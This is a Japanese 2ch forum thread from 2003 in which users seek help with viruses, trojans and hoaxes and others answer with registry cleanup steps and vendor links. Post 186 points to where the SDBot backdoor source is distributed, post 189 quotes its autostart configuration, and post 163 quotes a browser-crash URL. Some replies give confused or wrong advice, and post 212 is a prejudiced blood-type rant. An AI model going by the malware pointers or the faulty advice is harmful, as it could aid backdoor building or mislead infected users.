次のレジストリキーを1つずつ選択します。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices

上記のキーごとに、画面右側で次の値を探し、発見した値を削除します。

Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe

(またはトロイの木馬として検出されたファイルを参照している値)

ここでRunはありましたがその中に上記値はありませんでした。
またRunServicesはそのものがありませんでした。

とこんな感じです。


85 :名無しさん@お腹いっぱい。:03/02/24 19:08
お邪魔します。
本日OnMouseOutという件名の添付ファイルつきメールが届きました。
これは開いたらヤバイですか?

86 :名無しさん@お腹いっぱい。:03/02/24 19:29
>>85
>1を読み直す。件名・ファイル名では判断できない。

87 :55:03/02/24 23:38
55です。 あれからイロイロと調べていじってみた結果
自PCでJAVAが含まれているWEBページのソースを見ると
ヘンなスクリプトが追加されてしまうことがわかりました。
(自分のサイト以外のトコのでも)
原因はわかりませんが、ウイルスではないようなので(ジョーク系のようです、多分)
他スレに逝ってみます。

cheshire-cat ◆PhCATJR.v6 さん、ありがとうございました

88 :名無しさん@お腹いっぱい。:03/02/25 12:13
age

89 :名無しさん@お腹いっぱい。:03/02/25 12:17
jdbgmgr.exe

ってウイルスなのですか?
灰色のテディベアのアイコンが表示されています。

90 :名無しさん@お腹いっぱい。:03/02/25 12:32
>>89
「そのファイル名 ウイルス」でぐぐれ。
どうせ、メールで回ってきた話なんだろ。

91 :名無しさん@お腹いっぱい。:03/02/25 12:33
>>89
何度も何度も既出。検索するなり過去ログ読んでから書き込んで欲しい。

「jdbgmgr.exe」に関するデマメール情報
http://www.ipa.go.jp/security/topics/alert140515.html

92 :名無しさん@お腹いっぱい。:03/02/25 13:02
今日、ノートンがMacro.srcなるウィルスを感知したのですが、これについて
情報を調べてみてもどこにものってないんです。
これはいったいなんなんですか??


93 :名無しさん@お腹いっぱい。:03/02/25 13:05
>情報を調べてみてもどこにものってないんです。
大嘘つきめ
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2

94 :名無しさん@お腹いっぱい。:03/02/25 13:16
(´-`).。oO(http://pc2.2ch.net/pcqa/で訊くべき質問多すぎ…)

95 :名無しさん@お腹いっぱい。:03/02/25 15:20
時間を置いてCDドライブのアクセスランプが
勝手に点灯したりするんですが
ウイルスにやられちまってるんでしょうか?
ウイルスバスターオンラインで一応調べてみたんすが、
何も検出はされなかったんです。

96 :名無しさん@お腹いっぱい。:03/02/25 15:49
>>95
アンチウィルスソフトぐらい買って常駐させとけ。
最新定義で検出されなかったら、ウィルスの可能性はかなり低い。

97 :名無しさん@お腹いっぱい。:03/02/25 22:28
age

98 :名無しさん@お腹いっぱい。:03/02/26 09:14
あげ

99 :名無しさん@お腹いっぱい。:03/02/26 12:07
W32.HLLW.Lovgate.C@mm
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.lovgate.c@mm.html
WORM_LOVGATE.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LOVGATE.C
W32/Lovgate@M
http://www.nai.com/japan/virusinfo/virL.asp?v=W32/Lovgate@M

100 :あぼーん:あぼーん
あぼーん

101 :名無しさん@お腹いっぱい。:03/02/26 15:20
>100
板違い。帰れ。

102 :名無しさん@お腹いっぱい。:03/02/26 17:41
WINMEでノートンアンチウィルス使用なのですが
画面にIEの背景緑の窓が開き、顔文字らしきものが書いてあります。
その窓がデスクトップ上を勝手に動き回りWINも強制終了出来ません。
多分hotmailからの感染だと思うのですがやっぱウィルスですか?汗
ノートンさんには引っかからなかったんだけど...。

103 :名無しさん@お腹いっぱい。:03/02/26 17:55
>>102
Hotmailもウィルスチェックしてるんだけどなぁ。
ジョークプログラムじゃないの?

104 :100はナニ?????:03/02/26 22:52
  

105 :名無しさん@お腹いっぱい。:03/02/26 22:59
>>104
氏ね、無断コピぺ厨房

106 :名無しさん@お腹いっぱい。:03/02/26 23:01
>>104
お前がよくコピペしてる不正中継のデータ、ちゃんと確認してるか?
中継したように見せ掛ける鯖があるんだぞ。

107 :名無しさん@お腹いっぱい。:03/02/27 08:27
age

108 :名無しさん@お腹いっぱい。:03/02/27 10:36
先日、メールに乗ってやってきたW32.Klez.H@mmとW32.ElKernにPCが感染しました。
即駆除し、トレンドマイクロとシマンテックのオンラインスキャン
及びノートンでもウィルススキャンして、感染ファイル0を確認した上で
PCをリカバリーし、再度ウィルススキャンをかけて感染ファイルがない事を確認しました。
しかしながらPCがちょっと不審な動きをしたように感じただけで、
ウィルスがまだPCに潜在しているのではと気になってしかたがありません。

ここまでやって感染が確認されなければ、ウィルスは消滅したと考えてもよろしいのでしょうか?
googleで検索した対処法では、ウィルス感染PCを駆除しないままリカバリーしても
ウィルスは駆除出来ると書いてあったのですが、駆除した上でのリカバリーなら
なお安心してもよろしいのでしょうか?
どうかご教授お願いいたします。

長文で失礼いたしました。

109 :名無しさん@お腹いっぱい。:03/02/27 10:41
>>108
リカバリーがハードディスク初期化+OS再インストールを意味しているなら感染はしていない。
もっと安心したいならPC買い換えろ。(w
それよりも、バスターかノートン買って常駐させとけ。

110 :名無しさん@お腹いっぱい。:03/02/27 10:41
>>108
W32.Klez駆除ツール使ってみた?
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

きちんと駆除して、アンチウィルスソフトを最新定義で常駐させてれば気にすることはないはず。

WindowsUpdateもやっておくこと。

111 :名無しさん@お腹いっぱい。:03/02/27 11:11
>>109さん
すみません、ど初心者なのでこれがOSの再インストールにあたるかはわからないのですが
リカバリーディスクによる、出荷時点への初期化をいたしました。
それがOS再インストール&HDの初期化と考えてもよろしいのでしょうか?

>>110さん
はい。ウィルス駆除には、Klezスレッドを辿り、そのツールを頼る事で駆除がかないました。

お二方のアドバイスにありますように、今後は定義最新のソフトの常駐を万全とし
WindowsUpdateを怠らないよう肝に銘じておきます。
お二方のご教授とアドバイスに感謝します。ありがとうございましたm(_)m

112 :名無しさん@お腹いっぱい。:03/02/27 17:15
age

113 :名無しさん@お腹いっぱい。:03/02/27 17:42
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_MERASH.A&VSect=T

>>102
これかい?


114 :名無しさん@お腹いっぱい。:03/02/27 17:50
>>102>>113
Hotmail のウィルスチェックって McAfee だから、
MERASH のようなウィルスでないとされるジョークプログラムは、すり抜けるということかな。

115 :名無しさん@お腹いっぱい。:03/02/27 18:32
お願いします。

ttp://www11.ocn.ne.jp/~maki17/text/17sai_text/17sai.htm

116 :名無しさん@お腹いっぱい。:03/02/27 18:38
確かに似たような感じですね。
毎日出るわけではないので...MERASH.Aも何かのタイミングで
行動を起こすのでしょうか...。
今度現象が出たらタスクマネージャーで見てみます。
でも前回タスクマネージャーが動かなかったんだよなぁ...。

>>113 ありがとうございました。


117 :名無しさん@お腹いっぱい。:03/02/27 18:41
>>115
この板では鑑定はやらない。
ラウンジ 勇気がなくて見られない画像解説スレ part301
http://ex.2ch.net/test/read.cgi/entrance/1046318666/l50

118 :bloom:03/02/27 18:46
http://www.agemasukudasai.com/bloom/

119 :名無しさん@お腹いっぱい。:03/02/27 20:20
>>116
ディスククリーンアップ(インターネット一時ファイルの削除)
したほうがいいっすよ。
それよりも、なんか怪しげなリンク(2ch内で?)
踏んだかを思い出してみたほうがいいですよ。




120 :名無しさん@お腹いっぱい。:03/02/28 08:17
age

121 :名無しさん@お腹いっぱい。:03/02/28 14:54
すみません。ウイルスバスター2003の検索でウイルスが確認されないにもかかわらず、
ファイアーウォールログに十数回/minものトロイの木馬ブロックがあるのはおかしいでしょうか?
ウイルスチェックに引っかからないため、どのように対応してよいのかわかりません。
よろしくおねがいしますm(_ _)m

122 :名無しさん@お腹いっぱい。:03/02/28 15:34
>>121
トロイの木馬ブロックはインバウンド(外から内)をブロック。
ウィルスチェックはPC内部にトロイ等がいるかをスキャン。
"トロイの木馬ブロック"の意味がわかってないんでしょ。
まずは、トロイの木馬ブロックの意味をトレンドマイクロのサイトで検索汁。

123 :名無しさん@お腹いっぱい。:03/02/28 16:19
昨日ホームページを見ていたら、突然すごい量のデータが送られてきてPCが不安定になりました。
その後インターネットの接続ができなくなったので、接続を見てみると、ユーザー名とパスワードが消去されていました。
おかししと思ってアンチウイルスをダウンロードしてチェックしたところ、HTML.Rodlof.Aに感染しているとのことで、感染しているものを2個削除しました。
でも、このウィルスについて調べたところ、症状が全く違っているので、本当にこのウィルスなのかどうか不安です。
昨日更新されたファイルを検索してみたところ、ちょうどPCがおかしくなった時間に大きなファイルが更新されています。
ウィルスチェックで問題部分を削除してあるのに、こういった変なファイルが残っているのでとても不安なのです。
単にウィルスチェックをし、ひっかかったファイルを削除するだけで問題は解決されるものなのでしょうか。
教えてください。よろしくお願いします。

124 :名無しさん@お腹いっぱい。:03/02/28 16:23
>>123
ウィルスによる。
Redlofであることが確実なら、
http://www.ipa.go.jp/security/topics/newvirus/redlof.html参照。

アンチウィルスソフトは常駐させとけ。

125 :x:03/02/28 16:37
↓↓↓↓↓★ココだ★↓↓↓↓↓
http://www.pink-angel.jp/betu/linkvp/linkvp.html

126 :名無しさん@お腹いっぱい。:03/02/28 17:57
>>125

 そ こ か ッ ! ! ! 




127 :名無しさん@お腹いっぱい。:03/02/28 18:14
(゚Д゚)ゴルァ!!

128 :名無しさん@お腹いっぱい。:03/02/28 20:23
最近、ポート520に大量にパケットが送られてきますが
ウイルスでしょうか?



129 :名無しさん@お腹いっぱい。:03/02/28 21:11
>>128
それ俺

130 :121:03/02/28 23:07
>>122さん
レスありがとうございます。
自分はPCはそこまで詳しくはないのですが、トロイの木馬ブロックの意味は一応分かっているつもりです。
実は二週間ほど前にトロイが検出されたことがあって、それについてはtrendmicro社のHPどおりに
完全に除去できたのですが、その2,3日後から一分間に何回もHDがコリコリ鳴り出して、
原因を調べてみたらウイルスバスターのログにそれまでは一つもなかった木馬ブロックが一杯・・・
という状況なんです。
これはいったい、、、トロイ使いにPC覚えられて外部からアタックしようと狙われているのでしょうか?
それともこの状況は普通で、バスターご使用の皆さんも毎分何回も木馬ブロックがログに残っているものなのでしょうか?
なんだかPCの動作も若干ですが重くなったような気もしますし・・・
よろしくお願いします。

131 :名無しさん@お腹いっぱい。:03/03/01 13:55
age

132 :名無しさん@お腹いっぱい。:03/03/02 02:33
うちのNortonAntiVirusによるとVBSLoveLetter.Aというウイルスに感染した模様です。しかも削除すらできません。これどうしたらよいのでしょうか?詳しい方教えてやってください!

133 :名無しさん@お腹いっぱい。:03/03/02 02:40
>>132
↓これっぽい気がするのだが、違うのであればSymantecのサイト
  でとりあえず調べれ
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/

134 :名無しさん@お腹いっぱい。:03/03/02 02:40
>>132
あやしいメールは開かないようにね
http://www.symantec.com/region/jp/sarcj/data/v/fix.vbs.loveletter.html

135 :名無しさん@お腹いっぱい。:03/03/02 02:41
ウイルスとウイルスが合体したウイルスのニュースの記事はどこですか?

136 :名無しさん@お腹いっぱい。:03/03/02 19:40
age

137 : :03/03/03 00:04
http://a2ch1234.hp.infoseek.co.jp/
これは何でしょうか?
ブラ蔵だという噂もあって踏むのが怖いんですが。
ノートン持ってるかたチェックお願いします

138 : ◆CaKkuEV3EI :03/03/03 00:42
>>137
2ちゃんねらーPC環境調査 というページ

調査終了しますた。ご協力して頂いた方々、サンクス!
結果は↓にありまつ。。

とあり、円グラフでOS、ブラウザ、ディスプレイ解像度、ディスプレイカラー数
が表示してあります。  NIS2002無反応でした。。

今後はブラクラやウイルスの判定にラウンジまたはFLASHの
勇気がなくて見られない画像解説スレへお越しください。

139 : ◆CaKkuEV3EI :03/03/03 00:54
ウイルスとその対策にはこちらのスレは有益です。
ログは貴重な財産でいつもこちらのスレを参考に
させていただいています。
あらためて、ありがとうございます。

140 :名無しさん@お腹いっぱい。:03/03/03 08:16
>>137
この板では鑑定はやらない。

鑑定依頼は、ラウンジの
勇気がなくて見られない画像解説スレ Part303
http://ex.2ch.net/test/read.cgi/entrance/1046620158/l50へ。

141 :bloom:03/03/03 09:11
http://www.agemasukudasai.com/bloom/

142 :名無しさん@お腹いっぱい。:03/03/03 10:53
>>137
この板のブラクラスレにチェッカーのリンクがあるから自分で鑑定しろ。
ツールに頼らず鑑定できるスキルを身に付けることも重要。
view-source:http://... でソースを見ることが出来るから鍛錬しろ。

143 :マーク:03/03/03 13:34
ウイルスは基本的にメールに











基本的にウイルスはメールにファイルが付いてあるはずです。そのファイルを開かなければウイルスに感染する心配はないと思います。
ウイルスがあると思われるメールは題名の文字が変な風になっていたり内容の文字がすべて英語でのようなメールは削除しましょう。





144 :名無しさん@お腹いっぱい。:03/03/03 13:40
>>143は荒らしです。無視してください。
添付ファイルをクリックしなくても感染することがあります。
日本語の件名で来るウィルスメールもあるので信用しないこと。
アンチウィルスソフトを常駐させること。

145 :名無しさん@お腹いっぱい。:03/03/04 08:29
age


146 :名無しさん@お腹いっぱい。:03/03/04 08:29
age


147 :名無しさん@お腹いっぱい。:03/03/04 12:35
教えてください。
Yahooのウェブメールを使用していますが、知り合いから受信したメールで容量が
約20KBで、開くとそれほど長くはない通常の文章の下に、記号のような文字がずらずらと
並んでいます。これってウィルスの可能性が高いのでしょうか?
ウィルスバスター2003(リアルタイム検索)は何も反応を示さないのですが、大丈夫と
いうことなのでしょうか。ちなみに添付ファイルはありません。

148 :名無しさん@お腹いっぱい。:03/03/04 12:39
>>147
ウィルスバスター2003は何も反応を示さないんなら問題ないんじゃない。
知り合いに訊いてみたら?

フリーメールで送信したメールに広告のようなものが付加されることがある。
そうしたものが記号ずらずらとなってる可能性はある。

149 :名無しさん@お腹いっぱい。:03/03/04 12:49
た デ ウ
だ コ イ
の | ル
文 ド ス
字 で も
列 き
   な
   き
   ゃ

150 :名無しさん@お腹いっぱい。:03/03/04 13:02
(・∀・)

151 :名無しさん@お腹いっぱい。:03/03/04 15:03
>>148
有難うございました。一応知り合いにはウィルススキャンをしてみるよう
言ってみます。

152 :名無しさん@お腹いっぱい。:03/03/04 17:25
「ネットサーフィンでもウイルスに感染する」――IPAが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030304/2/

コンピュータウイルス・不正アクセスの届出状況について[要旨]
ネットサーフィンでの被害に注意!!
http://www.ipa.go.jp/security/txt/2003/03outline.html

153 :名無しさん@お腹いっぱい。:03/03/04 19:29
もしかしてウィルスかもしれないんですが・・・
昨日からOutlookexpressやInternetexplore立ち上げても
回線接続用の小窓(『接続』とか『オフラインで使用』なんかのボタンがついてる窓)
が何度やってもでてきません。
今は仕方ないので、マイコンピューター→ダイヤルアップネットワーク→回線ダブルクリック
で接続してます。
更に各画面の右上に必ず出る−□×がいずれも0,1、rとかになってて
更にそういう細かい狂いが見られるのですがどうしたらいいでしょう。

この間英語のサイトからスクリーンセーバーをダウンロードしてから
AWS WetherBugっていうのも勝手にダウンロードされて来たみたいで
画面の右下はし(時刻表示の隣)に起動時に出て来るようになりました。
これも原因かもと思うのですが、どうやったら自分で直せるかご存知の方いらっしゃいましたら
教えていただけませんか?

154 :名無しさん@お腹いっぱい。:03/03/04 19:36
>>153
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

155 :名無しさん@お腹いっぱい。:03/03/04 19:47
ウィルスを駆除しようとしたらそのファイルが無くなっていました。
このままでは不安です。どう対処すれば良いですか?
再度スキャンしても反応がありません。

156 :名無しさん@お腹いっぱい。:03/03/04 19:55
感染ファイルがないならそれでいいじゃん。
つか削除したんじゃないの?何でスキャンしたか知らんけど
あとまともに答えてほしかったら環境ぐらい書けよクズ

157 :名無しさん@お腹いっぱい。:03/03/04 20:09
WindowsXP,IE6,VirusScanです。ウィルスはトロイの木馬でした。
駆除するときファイルが無いとエラーが出ました。たぶん削除はしてないと思います。
ディレクトリを確かめましたが見当たりませんでした。

158 :名無しさん@お腹いっぱい。:03/03/04 20:16
>>157馬鹿フィースレで聞けば?ソースネ糞トのなんて常人は使わんし
ていうか、エラーログとかトロイの種類をさらに小出しにするあたり
誰も答えたくないと思うけど

159 :名無しさん@お腹いっぱい。:03/03/04 21:34
携帯メールにKlezが着ました。

受信してもいいですか?

160 :名無しさん@お腹いっぱい。:03/03/04 22:19
>>159
ご自由にどうぞ。

161 : :03/03/04 22:26


162 :名無しさん@お腹いっぱい。:03/03/04 22:33
Arien.vbsとTalurahoma.vbsが組みこまれているんですけど
レジストリの削除のし方教えて下さい

163 :名無しさん@お腹いっぱい。:03/03/04 23:15
今さっき踏んだ下記のリンク先のアドレスがcrashmeになっていました。
ttp://news2.2ch.net|test|read.cgi|newsplus%40195.126.71.77/%63%72%61%73%68%6D%65
オンラインスキャンに行き検索しようと試みましたが作動しません。
至急方法を教えてください。
宜しくお願いします。

164 :163:03/03/04 23:41
何とか削除できました。
お騒がせして申し訳御座いませんでした。

165 :名無しさん@お腹いっぱい。:03/03/05 08:08
age

166 :名無しさん@お腹いっぱい。:03/03/05 16:49
あげ

167 :cheshire-cat ◆PhCATJR.v6 :03/03/05 18:13
>>162
スタート→ファイル名を指定して実行→regedit→編集→検索。

んでもあくまでも、自己責任で。

168 :名無しさん@お腹いっぱい。:03/03/05 21:01
ここ数日で急にウイルスメールが増えました。
1日に5〜10通は来ます。
増える時期なんでしょうか?

169 :名無しさん@お腹いっぱい。:03/03/05 21:08
>>168
知らん。
ただ傾向から言って
長期休暇になるとたかがウィルスメールごときで書き込む奴が増えるのは確か

170 :名無しさん@お腹いっぱい。:03/03/05 21:10
大量にウイルスメールが送られてきまふ。
タイトルや差出人は全部違うけど、
プロパティの詳細を見ると先頭にあるReturn-Path: っていうのが
全部同じアドレスです。
その人から来てるってことでつか?

171 :名無しさん@お腹いっぱい。:03/03/05 22:03
>>170
KLEZでしょ。
その可能性が高いでふ。IPアドレスも調べませう。

172 :名無しさん@お腹いっぱい。:03/03/05 23:53
age

173 :名無しさん@お腹いっぱい。:03/03/06 08:18
age

174 :名無しさん@お腹いっぱい。:03/03/06 11:56
質問です。
先日自宅のPCからトロイの木馬が検出されました。
ウイルスバスター2003が入っているため、検出されたファイルは隔離されたのですが、
以降ファイアーウォールログにトロイの木馬ブロックがかなりの頻度で現れます。

で、トレンドマイクロのHPをよく読んでみたところ、
コンピュータのシステムが改変された場合にはシステムの修復を行う必要があります
とかいてありました。具体的には下記のレジストリの値を削除すればよいようなのですが、
値がランダムであるため、どれを削除してよいかわかりません。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices

それぞれに含まれる値は以下のとおりなのですが、どれが削除すべき値(通常あるべきでない値)なのか
教えていただけないでしょうか。m(_ _)mよろしくおねがいします。

[Run]
(標準)
Configuration Setup
NeroCheck
PCCClinent.exe
pccguide.exe
Pop3trap.exe
QuickTime Task
Synchronization Manager
TM Outbreak Agent

[RunServices]
(標準)
Configuration Setup

175 :ぼるぢょあ ◆yBEncckFOU :03/03/06 12:06
>>174
TM Outbreak Agent
↑これ何だ?知らないということは大事だから捨てちゃダメYO-
↓これはバスターのだから消しても問題ないYO-
PCCClinent.exe
Pop3trap.exe


176 :名無しさん@お腹いっぱい。:03/03/06 12:07
>>174
検出名は何?

177 :名無しさん@お腹いっぱい。:03/03/06 12:10
>>175
知らないということは大事だから捨てちゃダメ・・・
バスターだから消して問題ない・・・
なんだか逆のような気がするのですが・・・

>>176
検出名はBKDR_SDBOT.05.Bです。リンクは↓です。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.05.B&VSect=T

178 :名無しさん@お腹いっぱい。:03/03/06 12:16
TM Outbreak Agent

これもバスターのタスクでしょ?
見たところ特に怪しそうなのは無いみたいだけど・・・

179 :名無しさん@お腹いっぱい。:03/03/06 12:18
>>174
ここも参考にしてみれ
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.sdbot.html

180 :名無しさん@お腹いっぱい。:03/03/06 12:19
この前ウイルススキャンをしたら2chブラウザのスレから10個くらいウイルスが出てきたんですが
スレにウイルスが貼られてるみたいでした。これを保存するとパソコンに何か影響が出るんでしょうか

181 :名無しさん@お腹いっぱい。:03/03/06 12:22
>>180
>>2
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50

182 :名無しさん@お腹いっぱい。:03/03/06 12:25
>>181
影響はないんですね
ありがとうございます

183 :174:03/03/06 12:29
みなさん、即レスありがとうございます。
格別怪しそうなのはないということなのですが、>>179さんのリンクをよんでみたところ、

トロイの木馬はシステムの再起動時に自分自身が必ず実行されるようにするために、次の値か、
Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe
または上記に類似した値を次のレジストリキーに追加します。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

とありました。僕ので言うと、[Run][RunServices]の両方にある
Configuration Setup
が気になるところですが、これは通常あっておかしくないものなのでしょうか?

また、怪しいものが[Run][RunServices]にないばあい、ファイアーウォールログに
トロイの木馬ブロックが数十回/分で現れることの原因は何なのでしょう?
しかもログの送信/受信が「送信」になっているのですが・・・
PCがかなりの頻度でカリカリいって、動作が遅くなってしまっています。
度々ですみませんがご教唆くださいm(_ _)m

184 :名無しさん@お腹いっぱい。:03/03/06 12:39
>>183
まだ完全に駆除されていないので、トロイが送信してると思われ。
感染によって作成されたレジストリを完全に削除しる。
亜種が多いので書かれている情報と違うことが多い。
トロイの木馬として検出されたファイルを参照している値も削除。

バスターを一時停止させて、ノートンやマカフィーの体験版で検出してみるのもいいかもしれない。
手に負えないようならOSごとクリーンインストールしる。

185 :名無しさん@お腹いっぱい。:03/03/06 12:41
>>183
バスター常駐させていたのに感染したなら、
感染源も把握してきちんと対処しておくこと。
また同じことの繰り返しになる。IRCはやめた方がいいぞ。

186 :ぼぼぢょあ ◆yBEncckFOU :03/03/06 12:45
>>183
ttp://sdbot.xx.net/
多分、これかYO-
e-mail: sdbotxx@mail.ru
sonork id: 100.2600
icq: 21381594
irc: irc.lcirc.net, #sdbot
how to edit the source file

ソースでしかないYO-
リードミー見て自分でコンパイルしろYO-
作者にメールしてみてYO-

187 :ぼぢぢょあ ◆yBEncckFOU :03/03/06 12:50
つか、基本はソース配布だから色々いぢって有るYO-
リードミは結構丁寧だYO-
(・3・) アルェー 忘れたYO-

188 :174:03/03/06 12:59
みなさんありがとうございます。
これで最後の質問にします。
[Run]ないし[RunServices]にConfiguration Setupという値は含まれていて良いものでしょうか?


189 :ぽるじょあ ◆yBEncckFOU :03/03/06 15:25
>>188
(・3・) Eェー 
OSはwin2ksp2でバスター2002だと、んな値ないYO−

// sdbot05b.cのソース、デホルトの値だと、
const char filename[] = "syscfg32.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
// 他のヴァーヂョンのソースは見てナイYO−

ちなみに186<<ドメインとかメアドは伏字アルYO−
欲しいシトはググルで見付けるYO−

190 :ぼるじょあ ◆yBEncckFOU :03/03/06 16:37
(・3・) アグェー

191 :名無しさん@お腹いっぱい。:03/03/06 20:28
age

192 :名無しさん@お腹いっぱい。:03/03/06 20:56
C:\SystemVolumeInformation\_restore{4E0CD8E2-4D05-43EB-987A-EEBF20EEBEE59}\RP250\A0022512.vbs

ここにLoveLetterがいるそうなんですがドコに隠れてるんですか?
オンラインスキャンでは見つからなかったんですが。
AVG6.0アンチウイルスシステムを使ってて検出されました

193 :ぽるじょあ ◆yBEncckFOU :03/03/06 23:16
>>192
(・ё・) Eェー
タイムマシンで昔にかへったんだYO− 


194 :名無しさん@お腹いっぱい。:03/03/06 23:19
>>193
待ってたけど正直意味がわかりません

195 :ぽるじょあ ◆yBEncckFOU :03/03/07 00:04
>>194
(・ё・) Eェー
_restoreって何だYO−
漏れウインドヅ2000だからわからないC−
ウインドヅメーかXPなのかYO−
つか、、「ME ウイルス 駆除 リストア」でヤフでも検索するC−

196 :名無しさん@お腹いっぱい。:03/03/07 10:38
>>192
以下参照。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=5025

"どこに隠れてる"・・・って、そこに隠れてるんでしょ。
オンラインスキャンが利口になって、復元用フォルダは検索しなくなったのかな?

197 :名無しさん@お腹いっぱい。:03/03/07 12:35
フリーメール(hotmail)にcellpaddingという件名のメールが届きました。付属ファイルは無かったです。メールを見てしまったのですが白紙で何も書いてありませんでした。
outlookで開いたのではなくIEでMSN,hotmailのページから開きました。付属ファイルではなくこのような白紙のメールでもウイルスがついていてIEで見た場合も感染している場合はあるのでしょうか?
一応ノートンでウイルススキャンしたのですが、見つからない場合もあるのかもと心配で質問させていただきました。

説明不足、分かりにくい点がありましたら申し訳ありません。もしよろしければどなたか意見をいただけませんでしょうか?

198 :名無しさん@お腹いっぱい。:03/03/07 12:50
>>197
HTMLメールならありうるが、スキャンで発見される(自分で除外設定してなければ)から大丈夫。

199 :名無しさん@お腹いっぱい。:03/03/07 12:53
>>197
自分で判定できない奴はバスターかノートン入れて、それを信用しろ。

200 :名無しさん@お腹いっぱい。:03/03/07 12:59
>>197
知らないメールを開けれるあなたの神経が信じられない

201 :197:03/03/07 13:33

皆様叱咤激励、感想、ご意見ありがとうございました。オンラインスキャンもしてみましたが発見されなかったので信じてみます。このアドレスはある予約受付に使用していたものでして、不注意で開いてしまったのは反省しようと思います。どうもありがとうございました。

202 :名無しさん@お腹いっぱい。:03/03/07 13:58
>>197
http://by1fd.bay1.hotmail.msn.com/cgi-bin/dasp/links_shell.asp?curmbox=F000000001&a=593959d4d07014e6d853c0eaaeb40ad6&matter=faq&nl=1#q12

203 :名無しさん@お腹いっぱい。:03/03/07 14:03
>>202参考
http://pc.2ch.net/test/read.cgi/sec/1021363841/381-382n


204 :名無しさん@お腹いっぱい。:03/03/07 14:45
もういやだ。友達からウィルス来る度にセキユリティソフト入れろっていってるのに
ちっとも入れてくれない。
パソコンかえただのプロ場変えたから大丈夫だのちっとも解決にならないのに。
鬱蔚欝熨

205 :名無しさん@お腹いっぱい。:03/03/07 14:47
>>204 http://life.2ch.net/yume/逝け

206 :名無しさん@お腹いっぱい。:03/03/07 18:18
age

207 :名無しさん@お腹いっぱい。:03/03/07 21:18
age

208 :名無しさん@お腹いっぱい。:03/03/08 12:28
age

209 :名無しさん@お腹いっぱい。:03/03/08 12:51
Norton AntiVirus 検疫レポート
作成: 2003年3月8日 12:49:46
------------------------------------------------------------------------------

ファイル名
場所
状態 サイズ ウィルス名
ユーザー名 コンピュータ名 ドメイン
検疫日
提出日

------------------------------------------------------------------------------

l50[2]
C:\WINDOWS\Temporary Internet Files\Content.IE5\RB08LIZZ
検疫 14.4 KB VBS.LoveLetter.A
unknownUser OEMCOMPUTER N/A
2003年3月8日 12:45:54
未提出

------------------------------------------------------------------------------
これどうしたらいいですか?

210 :209:03/03/08 12:52
なんかPCものすごい変な音したんですけど。

211 :名無しさん@お腹いっぱい。:03/03/08 12:57
http://tv.2ch.net/test/read.cgi/nhk/1028882027/l50
ここ読もうと思ったときでした。
危険なんでしょうか。

212 :世直し一揆(コピペ推奨):03/03/08 13:02
<血液型A型の一般的な特徴>(見せかけのもっともらしさ(偽善)に騙されるな!!)
●とにかく気が小さい(神経質、臆病、二言目には「世間」(「世間」と言っても、同じA型を中心とした一部の人間の動向に過ぎないのだが・・・)、了見が狭い)
●他人に異常に干渉し、しかも好戦的でファイト満々(キモイ、自己中心、硬直的でデリカシーがない)
●妙に気位が高く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはた
いてい、内面的・実質的に負けている)
●本音は、ものすごく幼稚で倫理意識が異常に低い(人にばれさえしなければOK!)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者にはへつらい、弱い者に対してはいじめる)
●あら探しだけは名人級でウザイ(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため性格がうっとうしい(根暗)
●単独では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者、狭量)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、人の目を異常に気にする(「〜みたい」とよく言う、
世間体命)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度
も言ってキモイ)
●表面上協調・意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をしストレスを溜めておきながら、他人に猛烈に嫉妬
する(不合理な馬鹿)  
●後で自分の誤りに気づいても、強引に筋を通し素直に謝れない(切腹するしかない!)●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。包容力がなく冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(例:「俺のほうが男
前やのに、なんでや!(あの野郎の足を引っ張ってやる!!)」)

213 :あぼーん:あぼーん
あぼーん

214 :名無しさん@お腹いっぱい。:03/03/08 13:44
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
